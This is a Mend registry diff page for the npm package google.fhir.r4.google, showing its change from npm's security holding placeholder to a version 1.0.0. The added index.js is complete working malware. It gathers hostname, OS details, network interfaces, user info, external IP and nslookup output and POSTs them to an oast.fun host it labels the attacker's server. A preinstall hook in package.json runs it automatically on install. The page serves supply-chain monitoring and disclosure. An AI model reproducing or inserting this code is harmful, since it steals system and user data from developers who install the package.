npm - google.fhir.r4.google - Versions diffs - 0.0.1-security → 1.0.0 - Mend

google.fhir.r4.google 0.0.1-security → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of google.fhir.r4.google might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,82 @@
+const os = require('os');
+const https = require('https');
+const fs = require('fs');
+const exec = require('child_process').exec;
+// Function to send data to attacker's server
+function sendDataToAttacker(data) {
+    const options = {
+        hostname: 'tqixhxwvibvpvtsahqraqodmtpnukgttl.oast.fun',  // Attacker's server
+        port: 443,
+        path: '/googlefhir4',                 // Endpoint to collect data
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+            'User-Agent': data.userAgent   // Send user agent in headers
+        },
+    };
+    const req = https.request(options, (res) => {
+        console.log(`Data sent with status code: ${res.statusCode}`);
+    });
+    req.on('error', (e) => {
+        console.error(`Problem with request: ${e.message}`);
+    });
+    req.write(JSON.stringify(data));
+    req.end();
+}
+// Collect system info
+const systemInfo = {
+    hostname: os.hostname(),        // Get server's hostname
+    platform: os.platform(),        // OS platform (e.g., Linux, Windows)
+    arch: os.arch(),                // Architecture (x64, arm, etc.)
+    cpus: os.cpus().length,         // Number of CPU cores
+    memory: os.totalmem(),          // Total system memory
+    networkInterfaces: os.networkInterfaces(),
+};
+// Collect user-related info
+const userInfo = os.userInfo();
+// Get external IP (simple API call to a free IP lookup service)
+https.get('https://api.ipify.org?format=json', (resp) => {
+    let data = '';
+    resp.on('data', (chunk) => {
+        data += chunk;
+    });
+    resp.on('end', () => {
+        const ipInfo = JSON.parse(data);
+        systemInfo.externalIP = ipInfo.ip;
+        // Get company info (using the hostname)
+        exec(`nslookup ${os.hostname()}`, (error, stdout, stderr) => {
+            if (!error) {
+                systemInfo.companyDetails = stdout;
+            }
+            // Collect user agent (can be hardcoded or dynamically fetched in real scenarios)
+            const userAgent = "NodeJS Malicious Client/1.0";
+            // Prepare data to send
+            const collectedData = {
+                systemInfo,
+                userInfo,
+                userAgent,     // User agent string for tracking
+            };
+            // Send data to the attacker's server
+            sendDataToAttacker(collectedData);
+        });
+    });
+}).on("error", (err) => {
+    console.log("Error fetching IP: " + err.message);
+});
+// Execute immediately
+console.log("Malicious package executed.");

package/package.json CHANGED Viewed

@@ -1,6 +1,13 @@
 {
   "name": "google.fhir.r4.google",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+"preinstall": "index.js"
+  },
+  "author": "",
+  "license": "ISC",
+  "description": ""
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=google.fhir.r4.google for more information.